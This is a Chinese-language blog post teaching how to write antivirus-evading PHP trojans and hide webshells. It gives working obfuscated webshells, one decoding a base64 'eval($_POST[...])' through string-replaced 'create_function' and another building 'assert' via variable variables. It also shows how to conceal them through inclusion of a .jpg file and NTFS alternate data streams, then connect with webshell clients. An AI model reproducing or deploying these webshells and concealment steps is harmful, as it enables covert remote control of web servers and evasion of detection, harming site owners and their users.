美文网首页
13.免查杀脚本木马编写

13.免查杀脚本木马编写

作者: 皮蛋是个臭蛋 | 来源:发表于2020-08-20 20:31 被阅读0次

免查杀木马编写的方法:
把木马创建成函数,运行时调用函数、在线加密、组合法、变量覆盖

1.把木马创建成函数,运行时调用函数。

<?php 
$mt="JF9QT1N"; 
$ojj="QGV2YWwo";
$hsa="UWydpMGle";
$fnx="5BeSleleddKTs=";
$zk = str_replace("d","","sdtdrd_redpdldadcde"); 
$ef = $zk("z", "", "zbazsze64_zdzeczodze"); 
$dva = $zk("p","","pcprpepaptpe_fpupnpcptpipopn"); 
$zvm = $dva('', $ef($zk("le", "", $ojj.$mt.$hsa.$fnx))); 
$zvm(); 
?>

str_replace:参数:("需要匹配的字符","替换字符","需要匹配的对象")

$zk=str_replace("d","","sdtdrd_redpdldadcde")=str_replace    // $zk=str_replace
$ef=str_replace("z", "", "zbazsze64_zdzeczodze")=base64_decode   // $ef=base64_decode
$dva=str_replace("p","","pcprpepaptpe_fpupnpcptpipopn")=create_function  //$dva=create_function

$ojj.$mt.$hsa.$fnx=QGV2YWwoJF9QT1NUWydpMGle5BeSleleddKTs=
str_replace(("le", "", "QGV2YWwoJF9QT1NUWydpMGle5BeSleleddKTs=")=QGV2YWwoJF9QT1NUWydpMG5BeSddKTs=

base64_decode("QGV2YWwoJF9QT1NUWydpMG5BeSddKTs=")=@eval($_POST['i0nAy']);
create_function('',@eval($_POST['i0nAy']);)
$zvm(); 


image.png

2.变量覆盖

<?php
$h='f';
$$h=$_REQUEST['x'];                //$$h可以理解为先解析后边这个$h,然后在进行解析,最终解析成为$f
$d='CHECK';
$$d='ass';
$$d=$CHECK.'ert';
$CHECK($f);
?>

3.组合法
变量覆盖+在线加密

4.在线加密

2 后门分析

后门分析的方法:关键字定位(通过对代码进行分析)、网络通信(f12)、使用wsexplorer进行抓包。

1.webshell
webshell常常被称为匿名用户(入侵者)通过网站端口对网站服务器的某种程度上操作的权限。也可以成为网站后门。

抓取软件数据包的软件是wsexplorer.

webshell免杀的方法:
1.文件包含(可以将木马后缀改为jpg,写一个php代码包含这个jpg文件。)
2.通过ntfs交换数据流文件实现文件隐藏。(可以使用软件okfiugenn进行删除数据流文件。)
例子1. echo xxx >>test.txt :webshell.php (创建数据流文件,内容是保存到webshell.php中且隐藏。)
dir /r 查看数据流文件

例子2. notepad muma.php //使用记事本创建一句话木马
type muma.php >>test.txt:muma.php //创建新的交换流文件

数据流文件的访问方法:(不能直接被访问)
1.可以通过包含文件执行数据流文件,在使用菜刀(冰蝎,蚁剑)进行连接。


image.png

或者使用手工进行执行。


image.png

2.直接在注册表

相关文章

  • 13.免查杀脚本木马编写

    免查杀木马编写的方法:把木马创建成函数,运行时调用函数、在线加密、组合法、变量覆盖 1.把木马创建成函数,运行时调...

  • 木马查杀

    今天初次接触了《人类木马查杀》,感觉有点欲罢不能。 以前我看过一本李欣频的书,但是感触不是很大。现在再看她的这本书...

  • 渗透测试-木马免杀的几种方式

    前言 免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木...

  • 90行C++代码实现,QQ盗号木马之专杀工具的编写

    一、前言 由于我已经在《病毒木马查杀第004篇:熊猫烧香之专杀工具的编写》中编写了一个比较通用的专杀工具的框架,而...

  • mysql 定时备份脚本

    1.配置免密 2.编写脚本 3.cronrab

  • 1014

    十月九日木马查杀复盘 关于查杀的一些认识: 001 、在个案查杀过程中,教练始终保持着一种肯定、包容、鼓励的态度耐...

  • 【Kali】linux木马查杀

    通常系统中木马或者病毒后会有各种各样的特征异常特征:1.网络流量2.异常进程3.消耗资源,如占用CPU、内存、硬盘...

  • 应急之木马查杀

    什么是手动查杀病毒技术 为什么要学习手工病毒查杀技术 当病毒文件隐藏时我们就要借用ark系列工具 什么是ARK系列...

  • 查杀木马——“优秀”

    今天破了自己的一个小木马:“不聪明就是笨。” 从小我对笨这个词很敏感,妈妈一直在用类似的词来辱骂我们,骂得超级难听...

  • Hadoop-完全分布式安装步骤

    安装JDK 安装Hadoop 编写分发脚本 配置ssh免密 http://hadoop102:9870/[http...

网友评论

      本文标题:13.免查杀脚本木马编写

      本文链接:https://www.haomeiwen.com/subject/kzddjktx.html